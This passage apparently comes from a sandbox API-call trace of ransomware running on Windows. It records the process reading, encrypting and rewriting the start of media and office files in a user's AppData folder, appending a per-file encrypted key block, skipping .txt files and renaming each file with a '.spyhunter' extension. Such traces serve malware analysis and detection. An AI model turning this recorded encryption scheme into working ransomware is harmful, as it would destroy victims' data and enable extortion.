lpOverlapped=0x0) returned 1 [0140.884] CloseHandle (hObject=0x184) returned 1 [0140.885] GetProcessHeap () returned 0x2c0000 [0140.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.885] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cqLF420dbSuALDTrG.mp3.spyhunter") returned 81 [0140.885] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cqLF420dbSuALDTrG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cqlf420dbsualdtrg.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cqLF420dbSuALDTrG.mp3.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cqlf420dbsualdtrg.mp3.spyhunter")) returned 1 [0140.891] GetProcessHeap () returned 0x2c0000 [0140.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.891] GetProcessHeap () returned 0x2c0000 [0140.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.891] GetProcessHeap () returned 0x2c0000 [0140.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c818a0 | out: hHeap=0x2c0000) returned 1 [0140.891] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f438 | out: pbBuffer=0x248f438) returned 1 [0140.891] GetProcessHeap () returned 0x2c0000 [0140.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.891] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f430*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f430*=0x30) returned 1 [0140.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CnJtBo9L8dN3oHzok.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cnjtbo9l8dn3ohzok.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CnJtBo9L8dN3oHzok.avi") returned 71 [0140.892] StrStrW (lpFirst="CnJtBo9L8dN3oHzok.avi", lpSrch=".txt") returned 0x0 [0140.892] GetProcessHeap () returned 0x2c0000 [0140.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0140.892] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f3f4*=0x2800, lpOverlapped=0x0) returned 1 [0140.893] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.893] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f3f4*=0x2800, lpOverlapped=0x0) returned 1 [0140.893] GetProcessHeap () returned 0x2c0000 [0140.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0140.893] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.893] WriteFile (in: hFile=0x184, lpBuffer=0x248f434*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3f4, lpOverlapped=0x0 | out: lpBuffer=0x248f434*, lpNumberOfBytesWritten=0x248f3f4*=0x4, lpOverlapped=0x0) returned 1 [0140.894] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f3f4*=0x30, lpOverlapped=0x0) returned 1 [0140.894] CloseHandle (hObject=0x184) returned 1 [0140.894] GetProcessHeap () returned 0x2c0000 [0140.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.894] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CnJtBo9L8dN3oHzok.avi.spyhunter") returned 81 [0140.894] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CnJtBo9L8dN3oHzok.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cnjtbo9l8dn3ohzok.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CnJtBo9L8dN3oHzok.avi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cnjtbo9l8dn3ohzok.avi.spyhunter")) returned 1 [0140.895] GetProcessHeap () returned 0x2c0000 [0140.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.895] GetProcessHeap () returned 0x2c0000 [0140.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.895] GetProcessHeap () returned 0x2c0000 [0140.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c817c8 | out: hHeap=0x2c0000) returned 1 [0140.895] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f430 | out: pbBuffer=0x248f430) returned 1 [0140.895] GetProcessHeap () returned 0x2c0000 [0140.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.895] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f428*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f428*=0x30) returned 1 [0140.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BATEMvxXyn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\batemvxxyn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.895] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BATEMvxXyn.mp3") returned 64 [0140.895] StrStrW (lpFirst="BATEMvxXyn.mp3", lpSrch=".txt") returned 0x0 [0140.895] GetProcessHeap () returned 0x2c0000 [0140.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0140.896] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f3ec*=0x2800, lpOverlapped=0x0) returned 1 [0140.896] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.896] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f3ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f3ec*=0x2800, lpOverlapped=0x0) returned 1 [0140.896] GetProcessHeap () returned 0x2c0000 [0140.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0140.897] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.897] WriteFile (in: hFile=0x184, lpBuffer=0x248f42c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3ec, lpOverlapped=0x0 | out: lpBuffer=0x248f42c*, lpNumberOfBytesWritten=0x248f3ec*=0x4, lpOverlapped=0x0) returned 1 [0140.897] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f3ec*=0x30, lpOverlapped=0x0) returned 1 [0140.897] CloseHandle (hObject=0x184) returned 1 [0140.897] GetProcessHeap () returned 0x2c0000 [0140.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.897] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BATEMvxXyn.mp3.spyhunter") returned 74 [0140.897] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BATEMvxXyn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\batemvxxyn.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BATEMvxXyn.mp3.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\batemvxxyn.mp3.spyhunter")) returned 1 [0140.898] GetProcessHeap () returned 0x2c0000 [0140.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.898] GetProcessHeap () returned 0x2c0000 [0140.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.898] GetProcessHeap () returned 0x2c0000 [0140.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e086e8 | out: hHeap=0x2c0000) returned 1 [0140.898] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f430 | out: pbBuffer=0x248f430) returned 1 [0140.898] GetProcessHeap () returned 0x2c0000 [0140.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.898] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f428*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f428*=0x30) returned 1 [0140.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B-JpE MJ_Wna5t.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b-jpe mj_wna5t.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.898] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B-JpE MJ_Wna5t.bmp") returned 68 [0140.899] StrStrW (lpFirst="B-JpE MJ_Wna5t.bmp", lpSrch=".txt") returned 0x0 [0140.899] GetProcessHeap () returned 0x2c0000 [0140.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0140.899] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f3ec*=0x2800, lpOverlapped=0x0) returned 1 [0140.899] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.899] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f3ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f3ec*=0x2800, lpOverlapped=0x0) returned 1 [0140.900] GetProcessHeap () returned 0x2c0000 [0140.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0140.900] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.900] WriteFile (in: hFile=0x184, lpBuffer=0x248f42c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3ec, lpOverlapped=0x0 | out: lpBuffer=0x248f42c*, lpNumberOfBytesWritten=0x248f3ec*=0x4, lpOverlapped=0x0) returned 1 [0140.900] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f3ec*=0x30, lpOverlapped=0x0) returned 1 [0140.900] CloseHandle (hObject=0x184) returned 1 [0140.900] GetProcessHeap () returned 0x2c0000 [0140.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.900] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B-JpE MJ_Wna5t.bmp.spyhunter") returned 78 [0140.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B-JpE MJ_Wna5t.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b-jpe mj_wna5t.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B-JpE MJ_Wna5t.bmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b-jpe mj_wna5t.bmp.spyhunter")) returned 1 [0140.901] GetProcessHeap () returned 0x2c0000 [0140.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.901] GetProcessHeap () returned 0x2c0000 [0140.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.901] GetProcessHeap () returned 0x2c0000 [0140.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c816f0 | out: hHeap=0x2c0000) returned 1 [0140.901] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f428 | out: pbBuffer=0x248f428) returned 1 [0140.901] GetProcessHeap () returned 0x2c0000 [0140.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.902] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f420*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f420*=0x30) returned 1 [0140.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aqebnKKzZ.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aqebnkkzz.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aqebnKKzZ.pdf") returned 63 [0140.902] StrStrW (lpFirst="aqebnKKzZ.pdf", lpSrch=".txt") returned 0x0 [0140.902] GetProcessHeap () returned 0x2c0000 [0140.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0140.902] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0140.903] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.903] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0140.903] GetProcessHeap () returned 0x2c0000 [0140.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0140.903] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.904] WriteFile (in: hFile=0x184, lpBuffer=0x248f424*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3e4, lpOverlapped=0x0 | out: lpBuffer=0x248f424*, lpNumberOfBytesWritten=0x248f3e4*=0x4, lpOverlapped=0x0) returned 1 [0140.904] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f3e4*=0x30, lpOverlapped=0x0) returned 1 [0140.904] CloseHandle (hObject=0x184) returned 1 [0140.904] GetProcessHeap () returned 0x2c0000 [0140.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.904] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aqebnKKzZ.pdf.spyhunter") returned 73 [0140.904] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aqebnKKzZ.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aqebnkkzz.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aqebnKKzZ.pdf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aqebnkkzz.pdf.spyhunter")) returned 1 [0140.905] GetProcessHeap () returned 0x2c0000 [0140.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.905] GetProcessHeap () returned 0x2c0000 [0140.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.905] GetProcessHeap () returned 0x2c0000 [0140.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85938 | out: hHeap=0x2c0000) returned 1 [0140.905] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f428 | out: pbBuffer=0x248f428) returned 1 [0140.905] GetProcessHeap () returned 0x2c0000 [0140.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.905] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f420*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f420*=0x30) returned 1 [0140.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Al3NNKhOeJe41D f.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\al3nnkhoeje41d f.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Al3NNKhOeJe41D f.ppt") returned 70 [0140.906] StrStrW (lpFirst="Al3NNKhOeJe41D f.ppt", lpSrch=".txt") returned 0x0 [0140.906] GetProcessHeap () returned 0x2c0000 [0140.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0140.906] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0140.907] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.907] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0140.907] GetProcessHeap () returned 0x2c0000 [0140.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0140.907] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.907] WriteFile (in: hFile=0x184, lpBuffer=0x248f424*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3e4, lpOverlapped=0x0 | out: lpBuffer=0x248f424*, lpNumberOfBytesWritten=0x248f3e4*=0x4, lpOverlapped=0x0) returned 1 [0140.907] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f3e4*=0x30, lpOverlapped=0x0) returned 1 [0140.907] CloseHandle (hObject=0x184) returned 1 [0140.907] GetProcessHeap () returned 0x2c0000 [0140.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.907] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Al3NNKhOeJe41D f.ppt.spyhunter") returned 80 [0140.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Al3NNKhOeJe41D f.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\al3nnkhoeje41d f.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Al3NNKhOeJe41D f.ppt.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\al3nnkhoeje41d f.ppt.spyhunter")) returned 1 [0140.908] GetProcessHeap () returned 0x2c0000 [0140.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.908] GetProcessHeap () returned 0x2c0000 [0140.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.908] GetProcessHeap () returned 0x2c0000 [0140.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81618 | out: hHeap=0x2c0000) returned 1 [0140.908] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f420 | out: pbBuffer=0x248f420) returned 1 [0140.908] GetProcessHeap () returned 0x2c0000 [0140.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.908] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f418*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f418*=0x30) returned 1 [0140.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AJI7ZEyRGBo-im.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aji7zeyrgbo-im.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.909] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AJI7ZEyRGBo-im.csv") returned 68 [0140.909] StrStrW (lpFirst="AJI7ZEyRGBo-im.csv", lpSrch=".txt") returned 0x0 [0140.909] GetProcessHeap () returned 0x2c0000 [0140.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0140.909] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f3dc*=0x18b5, lpOverlapped=0x0) returned 1 [0140.910] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffe74b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.910] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x18b5, lpNumberOfBytesWritten=0x248f3dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f3dc*=0x18b5, lpOverlapped=0x0) returned 1 [0140.910] GetProcessHeap () returned 0x2c0000 [0140.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0140.910] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.910] WriteFile (in: hFile=0x184, lpBuffer=0x248f41c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3dc, lpOverlapped=0x0 | out: lpBuffer=0x248f41c*, lpNumberOfBytesWritten=0x248f3dc*=0x4, lpOverlapped=0x0) returned 1 [0140.910] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3dc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f3dc*=0x30, lpOverlapped=0x0) returned 1 [0140.910] CloseHandle (hObject=0x184) returned 1 [0140.910] GetProcessHeap () returned 0x2c0000 [0140.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.910] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AJI7ZEyRGBo-im.csv.spyhunter") returned 78 [0140.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AJI7ZEyRGBo-im.csv" (normalized: "c:\\users\\5p5nrgjn0js 